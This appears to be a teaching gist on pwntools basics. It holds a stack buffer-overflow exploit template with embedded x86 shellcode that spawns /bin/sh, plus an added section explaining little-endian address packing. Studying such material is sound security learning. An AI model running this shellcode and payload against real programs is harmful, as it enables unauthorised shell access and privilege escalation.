@captainGeech42
Last active May 15, 2018 01:37
Sample of some basic pwntools operations
#!/usr/bin/env python
from pwn import *

# define our binary
binary = "/home/user/testbin"

#### Payloads ####
# Option 1: read in a payload that was prepared elsewhere
# (open() replaces the Python 2-only file() builtin; the body of the with block must be indented)
with open("payload.bin", "rb") as f:
    payload = f.read()

# Option 2: build the payload in the script
shellcode = "\x31\xC0\x31\xDB\x31\xC9\xB0\x46\x66\xBB\xB5\x36\x66\x89\xD9\xCD\x80\x31\xC0\xB0\x0B\x31\xC9\x31\xD2\x52\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69\x89\xE3\xCD\x80"
# p32() encodes a dword (4 bytes) in little-endian byte order
# there is also p64() if you are doing 64-bit binary exploitation
payload = "\x90" * 20 + shellcode + "A" * 32 + p32(0xffffd350)

#### Running the program ####
# Option 1: deliver the payload through argv
p = process(executable=binary, argv=[binary, payload])
# Option 2: deliver the payload through user input (stdin)
p = process(binary)
p.sendline(payload)

#### Getting a shell ####
# hand the process's stdin/stdout over to your terminal
p.interactive()
# if you get a message about receiving an EOF, and you press enter and the shell exits, you didn't actually get a shell
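The gist's comment on p32() and p64() is the one mechanism it explains: a multi-byte integer is written least-significant byte first on x86. The following is an added example, not code from the gist or from pwntools; it reimplements the little-endian packing and unpacking with the standard library's struct module (no pwntools install needed), shows the same dword in both byte orders, and adds a small helper, find_dword(), that locates a packed dword inside a byte string, which is the usual way to confirm where an address landed in a buffer or a captured memory dump. The address 0xffffd350 is the one from the gist; the sample buffer in the main block is constructed for illustration.

```python
import struct


def p32(value, endian="little"):
    """Pack an integer as a 4-byte dword, little-endian by default (what pwntools' p32() does)."""
    fmt = "<I" if endian == "little" else ">I"
    return struct.pack(fmt, value & 0xFFFFFFFF)


def p64(value, endian="little"):
    """Pack an integer as an 8-byte qword, little-endian by default (what pwntools' p64() does)."""
    fmt = "<Q" if endian == "little" else ">Q"
    return struct.pack(fmt, value & 0xFFFFFFFFFFFFFFFF)


def u32(data, endian="little"):
    """Inverse of p32(): read the first 4 bytes of data back into an integer."""
    fmt = "<I" if endian == "little" else ">I"
    return struct.unpack(fmt, bytes(data[:4]))[0]


def u64(data, endian="little"):
    """Inverse of p64(): read the first 8 bytes of data back into an integer."""
    fmt = "<Q" if endian == "little" else ">Q"
    return struct.unpack(fmt, bytes(data[:8]))[0]


def byte_order_table(value):
    """Return the same dword as hex byte lists in both byte orders, to make the
    'little-endian' comment concrete: the least significant byte is emitted first."""
    return {
        "little": [format(b, "02x") for b in p32(value, "little")],
        "big": [format(b, "02x") for b in p32(value, "big")],
    }


def find_dword(blob, value):
    """Return the offset of the little-endian encoding of value inside blob, or -1.
    Handy for checking where a packed address sits in a buffer or a memory dump."""
    return blob.find(p32(value))


if __name__ == "__main__":
    # 0xffffd350 is the address used on the gist; in memory it is stored as 50 d3 ff ff
    print(byte_order_table(0xffffd350))
    # constructed sample buffer: nop sled, filler, then the packed address (no shellcode)
    sample = b"\x90" * 20 + b"A" * 32 + p32(0xffffd350)
    print("packed address found at offset", find_dword(sample, 0xffffd350))
```

Running the block prints the two byte orders side by side and reports that the packed address starts at offset 52 of the constructed buffer (20 + 32 bytes of padding). The endian parameter defaults to little-endian because that is what pwntools assumes for x86 and x86-64 targets; pass "big" to reproduce network byte order.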